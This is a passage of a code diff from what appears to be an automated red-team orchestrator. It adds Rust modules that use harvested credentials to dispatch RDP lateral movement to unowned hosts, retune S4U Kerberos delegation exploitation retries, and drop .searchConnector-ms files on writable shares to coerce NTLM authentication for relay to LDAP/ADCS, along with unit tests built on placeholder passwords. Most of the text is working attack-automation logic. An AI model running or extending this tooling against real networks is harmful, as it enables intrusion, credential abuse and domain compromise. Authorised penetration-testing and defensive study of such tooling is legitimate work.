+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("rdp_lateral") {
+ continue;
+ }
+
+ let work: Vec = {
+ let state = dispatcher.state.read().await;
+ collect_rdp_work(&state)
+ };
+
+ for item in work {
+ let payload = json!({
+ "technique": "rdp_lateral",
+ "target_ip": item.host_ip,
+ "hostname": item.hostname,
+ "domain": item.domain,
+ "credential": {
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "domain": item.credential.domain,
+ },
+ });
+
+ let priority = dispatcher.effective_priority("rdp_lateral");
+ match dispatcher
+ .throttled_submit("lateral", "lateral", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ host = %item.host_ip,
+ hostname = %item.hostname,
+ "RDP lateral movement dispatched"
+ );
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_RDP_LATERAL, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_RDP_LATERAL, &item.dedup_key)
+ .await;
+ }
+ Ok(None) => {
+ debug!(host = %item.host_ip, "RDP lateral deferred");
+ }
+ Err(e) => {
+ warn!(err = %e, host = %item.host_ip, "Failed to dispatch RDP lateral");
+ }
+ }
+ }
+ }
+}
+
+/// Collect RDP lateral movement work items from current state.
+///
+/// Extracted from the async loop for testability.
+fn collect_rdp_work(state: &crate::orchestrator::state::StateInner) -> Vec {
+ if state.credentials.is_empty() {
+ return Vec::new();
+ }
+
+ let mut items = Vec::new();
+
+ for host in &state.hosts {
+ // Skip already-owned hosts
+ if host.owned {
+ continue;
+ }
+
+ // Check for RDP service (port 3389)
+ let has_rdp = host.services.iter().any(|s| {
+ let sl = s.to_lowercase();
+ sl.contains("3389") || sl.contains("rdp")
+ });
+ if !has_rdp {
+ continue;
+ }
+
+ let dedup_key = format!("rdp:{}", host.ip);
+ if state.is_processed(DEDUP_RDP_LATERAL, &dedup_key) {
+ continue;
+ }
+
+ // Infer domain from hostname
+ let domain = host
+ .hostname
+ .find('.')
+ .map(|i| host.hostname[i + 1..].to_lowercase())
+ .unwrap_or_default();
+
+ // Find admin credential for this domain
+ let cred = state
+ .credentials
+ .iter()
+ .find(|c| {
+ c.is_admin
+ && !c.password.is_empty()
+ && (domain.is_empty() || c.domain.to_lowercase() == domain)
+ && !state.is_credential_quarantined(&c.username, &c.domain)
+ })
+ .or_else(|| {
+ // Fall back to any credential with a password
+ state.credentials.iter().find(|c| {
+ !c.password.is_empty()
+ && (domain.is_empty() || c.domain.to_lowercase() == domain)
+ && !state.is_credential_quarantined(&c.username, &c.domain)
+ })
+ })
+ .cloned();
+
+ let cred = match cred {
+ Some(c) => c,
+ None => continue,
+ };
+
+ items.push(RdpWork {
+ dedup_key,
+ host_ip: host.ip.clone(),
+ hostname: host.hostname.clone(),
+ domain,
+ credential: cred,
+ });
+ }
+
+ items
+}
+
+struct RdpWork {
+ dedup_key: String,
+ host_ip: String,
+ hostname: String,
+ domain: String,
+ credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+ use crate::orchestrator::state::SharedState;
+ use ares_core::models::{Credential, Host};
+
+ fn make_credential(username: &str, password: &str, domain: &str, is_admin: bool) -> Credential {
+ Credential {
+ id: format!("c-{}", username),
+ username: username.into(),
+ password: password.into(), // pragma: allowlist secret
+ domain: domain.into(),
+ source: "test".into(),
+ is_admin,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ fn make_host(ip: &str, hostname: &str, services: Vec, owned: bool) -> Host {
+ Host {
+ ip: ip.into(),
+ hostname: hostname.into(),
+ os: String::new(),
+ roles: Vec::new(),
+ services,
+ is_dc: false,
+ owned,
+ }
+ }
+
+ #[tokio::test]
+ async fn collect_empty_state_returns_no_work() {
+ let shared = SharedState::new("test-op".into());
+ let state = shared.read().await;
+ let work = collect_rdp_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_no_credentials_returns_no_work() {
+ let shared = SharedState::new("test-op".into());
+ {
+ let mut s = shared.write().await;
+ s.hosts.push(make_host(
+ "192.168.58.10",
+ "srv01.contoso.local",
+ vec!["3389/tcp ms-wbt-server".into()],
+ false,
+ ));
+ }
+ let state = shared.read().await;
+ let work = collect_rdp_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_host_with_rdp_and_admin_cred() {
+ let shared = SharedState::new("test-op".into());
+ {
+ let mut s = shared.write().await;
+ s.hosts.push(make_host(
+ "192.168.58.10",
+ "srv01.contoso.local",
+ vec!["3389/tcp ms-wbt-server".into()],
+ false,
+ ));
+ s.credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local", true));
+ // pragma: allowlist secret
+ }
+ let state = shared.read().await;
+ let work = collect_rdp_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].host_ip, "192.168.58.10");
+ assert_eq!(work[0].hostname, "srv01.contoso.local");
+ assert_eq!(work[0].domain, "contoso.local");
+ assert_eq!(work[0].credential.username, "admin");
+ assert!(work[0].credential.is_admin);
+ }
+
+ #[tokio::test]
+ async fn collect_host_without_rdp_skipped() {
+ let shared = SharedState::new("test-op".into());
+ {
+ let mut s = shared.write().await;
+ s.hosts.push(make_host(
+ "192.168.58.10",
+ "srv01.contoso.local",
+ vec!["445/tcp microsoft-ds".into()],
+ false,
+ ));
+ s.credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local", true));
+ // pragma: allowlist secret
+ }
+ let state = shared.read().await;
+ let work = collect_rdp_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_owned_host_skipped() {
+ let shared = SharedState::new("test-op".into());
+ {
+ let mut s = shared.write().await;
+ s.hosts.push(make_host(
+ "192.168.58.10",
+ "srv01.contoso.local",
+ vec!["3389/tcp ms-wbt-server".into()],
+ true, // already owned
+ ));
+ s.credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local", true));
+ // pragma: allowlist secret
+ }
+ let state = shared.read().await;
+ let work = collect_rdp_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_already_processed_skipped() {
+ let shared = SharedState::new("test-op".into());
+ {
+ let mut s = shared.write().await;
+ s.hosts.push(make_host(
+ "192.168.58.10",
+ "srv01.contoso.local",
+ vec!["3389/tcp ms-wbt-server".into()],
+ false,
+ ));
+ s.credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local", true)); // pragma: allowlist secret
+ s.mark_processed(DEDUP_RDP_LATERAL, "rdp:192.168.58.10".into());
+ }
+ let state = shared.read().await;
+ let work = collect_rdp_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_falls_back_to_non_admin_cred() {
+ let shared = SharedState::new("test-op".into());
+ {
+ let mut s = shared.write().await;
+ s.hosts.push(make_host(
+ "192.168.58.10",
+ "srv01.contoso.local",
+ vec!["3389/tcp ms-wbt-server".into()],
+ false,
+ ));
+ // Only a non-admin credential available
+ s.credentials.push(make_credential(
+ "user1",
+ "P@ssw0rd!", // pragma: allowlist secret
+ "contoso.local",
+ false,
+ ));
+ }
+ let state = shared.read().await;
+ let work = collect_rdp_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "user1");
+ assert!(!work[0].credential.is_admin);
+ }
+
+ #[tokio::test]
+ async fn collect_prefers_admin_over_non_admin() {
+ let shared = SharedState::new("test-op".into());
+ {
+ let mut s = shared.write().await;
+ s.hosts.push(make_host(
+ "192.168.58.10",
+ "srv01.contoso.local",
+ vec!["3389/tcp ms-wbt-server".into()],
+ false,
+ ));
+ s.credentials.push(make_credential(
+ "user1",
+ "P@ssw0rd!", // pragma: allowlist secret
+ "contoso.local",
+ false,
+ ));
+ s.credentials.push(make_credential(
+ "admin",
+ "Adm1nP@ss!", // pragma: allowlist secret
+ "contoso.local",
+ true,
+ ));
+ }
+ let state = shared.read().await;
+ let work = collect_rdp_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "admin");
+ assert!(work[0].credential.is_admin);
+ }
+
+ #[tokio::test]
+ async fn collect_no_cred_for_domain_skipped() {
+ let shared = SharedState::new("test-op".into());
+ {
+ let mut s = shared.write().await;
+ s.hosts.push(make_host(
+ "192.168.58.10",
+ "srv01.contoso.local",
+ vec!["3389/tcp ms-wbt-server".into()],
+ false,
+ ));
+ // Credential for wrong domain
+ s.credentials.push(make_credential(
+ "admin",
+ "P@ssw0rd!", // pragma: allowlist secret
+ "fabrikam.local",
+ true,
+ ));
+ }
+ let state = shared.read().await;
+ let work = collect_rdp_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_bare_hostname_matches_any_domain_cred() {
+ let shared = SharedState::new("test-op".into());
+ {
+ let mut s = shared.write().await;
+ // Bare hostname (no domain suffix) → domain = "" → matches any cred
+ s.hosts.push(make_host(
+ "192.168.58.10",
+ "srv01",
+ vec!["3389/tcp ms-wbt-server".into()],
+ false,
+ ));
+ s.credentials.push(make_credential(
+ "admin",
+ "P@ssw0rd!", // pragma: allowlist secret
+ "fabrikam.local",
+ true,
+ ));
+ }
+ let state = shared.read().await;
+ let work = collect_rdp_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "");
+ }
+
+ #[tokio::test]
+ async fn collect_multiple_hosts() {
+ let shared = SharedState::new("test-op".into());
+ {
+ let mut s = shared.write().await;
+ s.hosts.push(make_host(
+ "192.168.58.10",
+ "srv01.contoso.local",
+ vec!["3389/tcp ms-wbt-server".into()],
+ false,
+ ));
+ s.hosts.push(make_host(
+ "192.168.58.11",
+ "srv02.contoso.local",
+ vec!["3389/tcp ms-wbt-server".into()],
+ false,
+ ));
+ s.hosts.push(make_host(
+ "192.168.58.12",
+ "web01.contoso.local",
+ vec!["80/tcp http".into()], // no RDP
+ false,
+ ));
+ s.credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local", true));
+ // pragma: allowlist secret
+ }
+ let state = shared.read().await;
+ let work = collect_rdp_work(&state);
+ assert_eq!(work.len(), 2);
+ let ips: Vec<&str> = work.iter().map(|w| w.host_ip.as_str()).collect();
+ assert!(ips.contains(&"192.168.58.10"));
+ assert!(ips.contains(&"192.168.58.11"));
+ }
+
+ #[tokio::test]
+ async fn collect_cred_with_empty_password_skipped() {
+ let shared = SharedState::new("test-op".into());
+ {
+ let mut s = shared.write().await;
+ s.hosts.push(make_host(
+ "192.168.58.10",
+ "srv01.contoso.local",
+ vec!["3389/tcp ms-wbt-server".into()],
+ false,
+ ));
+ s.credentials
+ .push(make_credential("admin", "", "contoso.local", true));
+ }
+ let state = shared.read().await;
+ let work = collect_rdp_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_rdp_detection_by_name() {
+ let shared = SharedState::new("test-op".into());
+ {
+ let mut s = shared.write().await;
+ s.hosts.push(make_host(
+ "192.168.58.10",
+ "srv01.contoso.local",
+ vec!["remote desktop rdp".into()],
+ false,
+ ));
+ s.credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local", true));
+ // pragma: allowlist secret
+ }
+ let state = shared.read().await;
+ let work = collect_rdp_work(&state);
+ assert_eq!(work.len(), 1);
+ }
+
+ #[tokio::test]
+ async fn collect_dedup_key_format() {
+ let shared = SharedState::new("test-op".into());
+ {
+ let mut s = shared.write().await;
+ s.hosts.push(make_host(
+ "192.168.58.10",
+ "srv01.contoso.local",
+ vec!["3389/tcp ms-wbt-server".into()],
+ false,
+ ));
+ s.credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local", true));
+ // pragma: allowlist secret
+ }
+ let state = shared.read().await;
+ let work = collect_rdp_work(&state);
+ assert_eq!(work[0].dedup_key, "rdp:192.168.58.10");
+ }
+
+ #[tokio::test]
+ async fn collect_cross_domain_hosts() {
+ let shared = SharedState::new("test-op".into());
+ {
+ let mut s = shared.write().await;
+ s.hosts.push(make_host(
+ "192.168.58.10",
+ "srv01.contoso.local",
+ vec!["3389/tcp ms-wbt-server".into()],
+ false,
+ ));
+ s.hosts.push(make_host(
+ "192.168.58.20",
+ "srv01.fabrikam.local",
+ vec!["3389/tcp ms-wbt-server".into()],
+ false,
+ ));
+ s.credentials.push(make_credential(
+ "admin",
+ "P@ssw0rd!", // pragma: allowlist secret
+ "contoso.local",
+ true,
+ ));
+ s.credentials.push(make_credential(
+ "fadmin",
+ "F@bPass1!", // pragma: allowlist secret
+ "fabrikam.local",
+ true,
+ ));
+ }
+ let state = shared.read().await;
+ let work = collect_rdp_work(&state);
+ assert_eq!(work.len(), 2);
+ // contoso host uses contoso cred
+ let contoso_work = work.iter().find(|w| w.host_ip == "192.168.58.10").unwrap();
+ assert_eq!(contoso_work.credential.domain, "contoso.local");
+ // fabrikam host uses fabrikam cred
+ let fab_work = work.iter().find(|w| w.host_ip == "192.168.58.20").unwrap();
+ assert_eq!(fab_work.credential.domain, "fabrikam.local");
+ }
+
+ #[tokio::test]
+ async fn collect_rdp_work_via_shared_state() {
+ let shared = crate::orchestrator::state::SharedState::new("test-op".into());
+ {
+ let mut state = shared.write().await;
+ state.hosts.push(make_host(
+ "192.168.58.10",
+ "srv01.contoso.local",
+ vec!["3389/tcp ms-wbt-server".into()],
+ false,
+ ));
+ state.credentials.push(make_credential(
+ "admin",
+ "P@ssw0rd!", // pragma: allowlist secret
+ "contoso.local",
+ true,
+ ));
+ }
+ let state = shared.read().await;
+ let work = collect_rdp_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].host_ip, "192.168.58.10");
+ }
+
+ #[test]
+ fn dedup_key_format() {
+ let key = format!("rdp:{}", "192.168.58.22");
+ assert_eq!(key, "rdp:192.168.58.22");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_RDP_LATERAL, "rdp_lateral");
+ }
+
+ #[test]
+ fn rdp_service_detection() {
+ let services = [
+ "3389/tcp ms-wbt-server".to_string(),
+ "80/tcp http".to_string(),
+ ];
+ let has_rdp = services.iter().any(|s| {
+ let sl = s.to_lowercase();
+ sl.contains("3389") || sl.contains("rdp")
+ });
+ assert!(has_rdp);
+ }
+
+ #[test]
+ fn no_rdp_service() {
+ let services = [
+ "445/tcp microsoft-ds".to_string(),
+ "80/tcp http".to_string(),
+ ];
+ let has_rdp = services.iter().any(|s| {
+ let sl = s.to_lowercase();
+ sl.contains("3389") || sl.contains("rdp")
+ });
+ assert!(!has_rdp);
+ }
+
+ #[test]
+ fn domain_from_hostname() {
+ let hostname = "srv01.contoso.local";
+ let domain = hostname
+ .find('.')
+ .map(|i| hostname[i + 1..].to_lowercase())
+ .unwrap_or_default();
+ assert_eq!(domain, "contoso.local");
+ }
+
+ #[test]
+ fn domain_from_bare_hostname() {
+ let hostname = "srv01";
+ let domain = hostname
+ .find('.')
+ .map(|i| hostname[i + 1..].to_lowercase())
+ .unwrap_or_default();
+ assert_eq!(domain, "");
+ }
+
+ #[test]
+ fn rdp_service_detection_by_name() {
+ let services = ["remote desktop rdp".to_string()];
+ let has_rdp = services.iter().any(|s| {
+ let sl = s.to_lowercase();
+ sl.contains("3389") || sl.contains("rdp")
+ });
+ assert!(has_rdp);
+ }
+
+ #[test]
+ fn rdp_service_detection_case_insensitive() {
+ let services = ["3389/TCP MS-WBT-SERVER".to_string()];
+ let has_rdp = services.iter().any(|s| {
+ let sl = s.to_lowercase();
+ sl.contains("3389") || sl.contains("rdp")
+ });
+ assert!(has_rdp);
+ }
+
+ #[test]
+ fn rdp_payload_structure() {
+ let payload = serde_json::json!({
+ "technique": "rdp_lateral",
+ "target_ip": "192.168.58.22",
+ "hostname": "srv01.contoso.local",
+ "domain": "contoso.local",
+ "credential": {
+ "username": "admin",
+ "password": "P@ssw0rd!",
+ "domain": "contoso.local",
+ },
+ });
+ assert_eq!(payload["technique"], "rdp_lateral");
+ assert_eq!(payload["target_ip"], "192.168.58.22");
+ assert_eq!(payload["hostname"], "srv01.contoso.local");
+ assert_eq!(payload["credential"]["domain"], "contoso.local");
+ }
+
+ #[test]
+ fn rdp_work_construction() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: true,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let work = RdpWork {
+ dedup_key: "rdp:192.168.58.22".into(),
+ host_ip: "192.168.58.22".into(),
+ hostname: "srv01.contoso.local".into(),
+ domain: "contoso.local".into(),
+ credential: cred,
+ };
+ assert_eq!(work.host_ip, "192.168.58.22");
+ assert_eq!(work.hostname, "srv01.contoso.local");
+ assert!(work.credential.is_admin);
+ }
+
+ #[test]
+ fn admin_credential_preferred() {
+ // The module first looks for admin creds, then falls back to any with password
+ let is_admin = true;
+ let has_password = true;
+ let admin_match = is_admin && has_password;
+ assert!(admin_match);
+ }
+
+ #[test]
+ fn empty_services_no_rdp() {
+ let services: Vec = vec![];
+ let has_rdp = services.iter().any(|s| {
+ let sl = s.to_lowercase();
+ sl.contains("3389") || sl.contains("rdp")
+ });
+ assert!(!has_rdp);
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/s4u.rs b/ares-cli/src/orchestrator/automation/s4u.rs
index 008d5e17..4d34453c 100644
--- a/ares-cli/src/orchestrator/automation/s4u.rs
+++ b/ares-cli/src/orchestrator/automation/s4u.rs
@@ -99,15 +99,23 @@ pub async fn auto_s4u_exploitation(
// Don't increment failure count beyond what dispatch already counted.
// The cooldown timer is already set from dispatch time.
}
- } else {
- // Success or non-revocation error — reset failure count so
- // subsequent dispatches aren't permanently blocked by the
- // S4U_MAX_FAILURES threshold.
+ } else if should_reset_failure_count(result) {
+ // Only reset the failure count on actual success.
+ // Generic failures (wrong SPN, delegation edge is
+ // stale, service rejects S4U, etc.) must keep their
+ // accumulated count so deterministic dead-ends
+ // eventually stop retrying.
if let Some(vid) = task_vuln_map.remove(&tid) {
if let Some(entry) = dispatch_tracker.get_mut(&vid) {
entry.1 = 0;
}
}
+ } else {
+ // Non-lockout, non-success failure: preserve the
+ // existing failure count that was incremented on
+ // dispatch. Remove the task mapping so future result
+ // scans do not reprocess it.
+ task_vuln_map.remove(&tid);
}
}
}
@@ -362,6 +370,11 @@ fn has_lockout_error(result: &ares_core::models::TaskResult) -> bool {
result_matches_patterns(result, LOCKOUT_PATTERNS)
}
+/// Only a successful S4U task should clear the accumulated failure count.
+fn should_reset_failure_count(result: &ares_core::models::TaskResult) -> bool {
+ result.success
+}
+
#[cfg(test)]
mod tests {
use super::*;
@@ -562,4 +575,28 @@ mod tests {
);
assert!(!has_lockout_error(&tr));
}
+
+ #[test]
+ fn successful_task_resets_failure_count() {
+ let tr = TaskResult {
+ task_id: "t-ok".to_string(),
+ success: true,
+ result: Some(json!({"summary": "ticket obtained"})),
+ error: None,
+ completed_at: Utc::now(),
+ };
+ assert!(should_reset_failure_count(&tr));
+ }
+
+ #[test]
+ fn generic_failure_does_not_reset_failure_count() {
+ let tr = TaskResult {
+ task_id: "t-fail".to_string(),
+ success: false,
+ result: Some(json!({"summary": "S4U failed: KRB_AP_ERR_MODIFIED"})),
+ error: None,
+ completed_at: Utc::now(),
+ };
+ assert!(!should_reset_failure_count(&tr));
+ }
}
diff --git a/ares-cli/src/orchestrator/automation/searchconnector_coercion.rs b/ares-cli/src/orchestrator/automation/searchconnector_coercion.rs
new file mode 100644
index 00000000..53c7ce0a
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/searchconnector_coercion.rs
@@ -0,0 +1,502 @@
+//! auto_searchconnector_coercion -- drop .searchConnector-ms files on writable shares.
+//!
+//! .searchConnector-ms XML files trigger WebDAV connections when a user browses
+//! the share in Explorer. Unlike .lnk/.scf/.url (handled by auto_share_coercion),
+//! searchConnector files force HTTP-based NTLM auth which bypasses SMB signing
+//! requirements, enabling relay to LDAP/ADCS even when SMB signing is enforced.
+//!
+//! This module targets writable shares that auto_share_coercion has already
+//! identified, deploying a complementary coercion technique.
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Collect SearchConnector coercion work items from current state.
+///
+/// Pure logic extracted from `auto_searchconnector_coercion` so it can be
+/// unit-tested without needing a `Dispatcher` or async runtime.
+fn collect_searchconnector_work(state: &StateInner, listener: &str) -> Vec {
+ if state.credentials.is_empty() {
+ return Vec::new();
+ }
+
+ let mut items = Vec::new();
+
+ for share in &state.shares {
+ if !share.permissions.to_uppercase().contains("WRITE") {
+ continue;
+ }
+
+ let dedup_key = format!("searchconn:{}:{}", share.host, share.name);
+ if state.is_processed(DEDUP_SEARCHCONNECTOR, &dedup_key) {
+ continue;
+ }
+
+ // Find credential for the share's host
+ let host_info = state.hosts.iter().find(|h| h.ip == share.host);
+ let domain = host_info
+ .and_then(|h| {
+ h.hostname
+ .find('.')
+ .map(|i| h.hostname[i + 1..].to_lowercase())
+ })
+ .unwrap_or_default();
+
+ let cred = state
+ .credentials
+ .iter()
+ .find(|c| !domain.is_empty() && c.domain.to_lowercase() == domain)
+ .or_else(|| state.credentials.first())
+ .cloned();
+
+ let cred = match cred {
+ Some(c) => c,
+ None => continue,
+ };
+
+ items.push(SearchConnectorWork {
+ dedup_key,
+ share_host: share.host.clone(),
+ share_name: share.name.clone(),
+ listener: listener.to_string(),
+ credential: cred,
+ });
+ }
+
+ items
+}
+
+/// Drops .searchConnector-ms coercion files on writable shares.
+/// Interval: 45s.
+pub async fn auto_searchconnector_coercion(
+ dispatcher: Arc,
+ mut shutdown: watch::Receiver,
+) {
+ let mut interval = tokio::time::interval(Duration::from_secs(45));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("searchconnector_coercion") {
+ continue;
+ }
+
+ let listener = match dispatcher.config.listener_ip.as_deref() {
+ Some(ip) => ip.to_string(),
+ None => continue,
+ };
+
+ let work: Vec = {
+ let state = dispatcher.state.read().await;
+ collect_searchconnector_work(&state, &listener)
+ };
+
+ for item in work {
+ let payload = json!({
+ "technique": "searchconnector_coercion",
+ "target_ip": item.share_host,
+ "share_name": item.share_name,
+ "listener_ip": item.listener,
+ "credential": {
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "domain": item.credential.domain,
+ },
+ });
+
+ let priority = dispatcher.effective_priority("searchconnector_coercion");
+ match dispatcher
+ .throttled_submit("coercion", "coercion", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ host = %item.share_host,
+ share = %item.share_name,
+ "searchConnector-ms coercion file dispatched"
+ );
+
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_SEARCHCONNECTOR, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_SEARCHCONNECTOR, &item.dedup_key)
+ .await;
+ }
+ Ok(None) => {
+ debug!(host = %item.share_host, "searchConnector coercion deferred");
+ }
+ Err(e) => {
+ warn!(err = %e, host = %item.share_host, "Failed to dispatch searchConnector coercion");
+ }
+ }
+ }
+ }
+}
+
+struct SearchConnectorWork {
+ dedup_key: String,
+ share_host: String,
+ share_name: String,
+ listener: String,
+ credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+ use crate::orchestrator::state::StateInner;
+ use ares_core::models::{Credential, Host, Share};
+
+ fn make_credential(username: &str, password: &str, domain: &str) -> Credential {
+ Credential {
+ id: format!("c-{username}"),
+ username: username.into(),
+ password: password.into(), // pragma: allowlist secret
+ domain: domain.into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ fn make_share(host: &str, name: &str, permissions: &str) -> Share {
+ Share {
+ host: host.into(),
+ name: name.into(),
+ permissions: permissions.into(),
+ comment: String::new(),
+ }
+ }
+
+ fn make_host(ip: &str, hostname: &str) -> Host {
+ Host {
+ ip: ip.into(),
+ hostname: hostname.into(),
+ os: String::new(),
+ roles: Vec::new(),
+ services: Vec::new(),
+ is_dc: false,
+ owned: false,
+ }
+ }
+
+ #[test]
+ fn dedup_key_format() {
+ let key = format!("searchconn:{}:{}", "192.168.58.22", "Public");
+ assert_eq!(key, "searchconn:192.168.58.22:Public");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_SEARCHCONNECTOR, "searchconnector");
+ }
+
+ #[test]
+ fn writable_share_detection() {
+ let write_perms = ["WRITE", "READ/WRITE", "rw WRITE access"];
+ for p in &write_perms {
+ assert!(
+ p.to_uppercase().contains("WRITE"),
+ "{p} should be detected as writable"
+ );
+ }
+ }
+
+ #[test]
+ fn readonly_share_rejected() {
+ let perm = "READ";
+ assert!(!perm.to_uppercase().contains("WRITE"));
+ }
+
+ #[test]
+ fn domain_from_host_hostname() {
+ let hostname = "srv01.contoso.local";
+ let domain = hostname
+ .find('.')
+ .map(|i| hostname[i + 1..].to_lowercase())
+ .unwrap_or_default();
+ assert_eq!(domain, "contoso.local");
+ }
+
+ #[test]
+ fn payload_structure_validation() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+
+ let payload = serde_json::json!({
+ "technique": "searchconnector_coercion",
+ "target_ip": "192.168.58.22",
+ "share_name": "Public",
+ "listener_ip": "192.168.58.50",
+ "credential": {
+ "username": cred.username,
+ "password": cred.password,
+ "domain": cred.domain,
+ },
+ });
+
+ assert_eq!(payload["technique"], "searchconnector_coercion");
+ assert_eq!(payload["target_ip"], "192.168.58.22");
+ assert_eq!(payload["share_name"], "Public");
+ assert_eq!(payload["listener_ip"], "192.168.58.50");
+ assert_eq!(payload["credential"]["username"], "admin");
+ assert_eq!(payload["credential"]["password"], "P@ssw0rd!"); // pragma: allowlist secret
+ assert_eq!(payload["credential"]["domain"], "contoso.local");
+ }
+
+ #[test]
+ fn writable_share_full_permission() {
+ let perm = "FULL";
+ // FULL does not contain WRITE, so it should NOT be detected
+ assert!(!perm.to_uppercase().contains("WRITE"));
+ }
+
+ #[test]
+ fn domain_from_fqdn_with_subdomain() {
+ let hostname = "web01.sub.contoso.local";
+ let domain = hostname
+ .find('.')
+ .map(|i| hostname[i + 1..].to_lowercase())
+ .unwrap_or_default();
+ assert_eq!(domain, "sub.contoso.local");
+ }
+
+ #[test]
+ fn domain_from_bare_hostname() {
+ let hostname = "dc01";
+ let domain = hostname
+ .find('.')
+ .map(|i| hostname[i + 1..].to_lowercase())
+ .unwrap_or_default();
+ assert_eq!(domain, "");
+ }
+
+ #[test]
+ fn dedup_key_special_characters_in_share_name() {
+ let key = format!("searchconn:{}:{}", "192.168.58.10", "Share With Spaces");
+ assert_eq!(key, "searchconn:192.168.58.10:Share With Spaces");
+
+ let key2 = format!("searchconn:{}:{}", "192.168.58.10", "data$");
+ assert_eq!(key2, "searchconn:192.168.58.10:data$");
+ }
+
+ #[test]
+ fn work_struct_construction() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "svc_admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+
+ let work = SearchConnectorWork {
+ dedup_key: "searchconn:192.168.58.22:Public".into(),
+ share_host: "192.168.58.22".into(),
+ share_name: "Public".into(),
+ listener: "192.168.58.50".into(),
+ credential: cred,
+ };
+
+ assert_eq!(work.dedup_key, "searchconn:192.168.58.22:Public");
+ assert_eq!(work.share_host, "192.168.58.22");
+ assert_eq!(work.share_name, "Public");
+ assert_eq!(work.listener, "192.168.58.50");
+ assert_eq!(work.credential.username, "svc_admin");
+ assert_eq!(work.credential.domain, "contoso.local");
+ }
+
+ #[test]
+ fn case_insensitive_permission_matching() {
+ let perms = ["write", "Write", "WRITE", "read/Write", "Read/WRITE"];
+ for p in &perms {
+ assert!(
+ p.to_uppercase().contains("WRITE"),
+ "{p} should be detected as writable regardless of case"
+ );
+ }
+ }
+
+ // --- collect_searchconnector_work tests ---
+
+ #[test]
+ fn collect_empty_state_returns_no_work() {
+ let state = StateInner::new("test-op".into());
+ let work = collect_searchconnector_work(&state, "192.168.58.50");
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_credentials_returns_no_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .shares
+ .push(make_share("192.168.58.22", "Public", "WRITE"));
+ let work = collect_searchconnector_work(&state, "192.168.58.50");
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_shares_returns_no_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_searchconnector_work(&state, "192.168.58.50");
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_writable_share_produces_work() {
+ let mut state = StateInner::new("test-op".into());
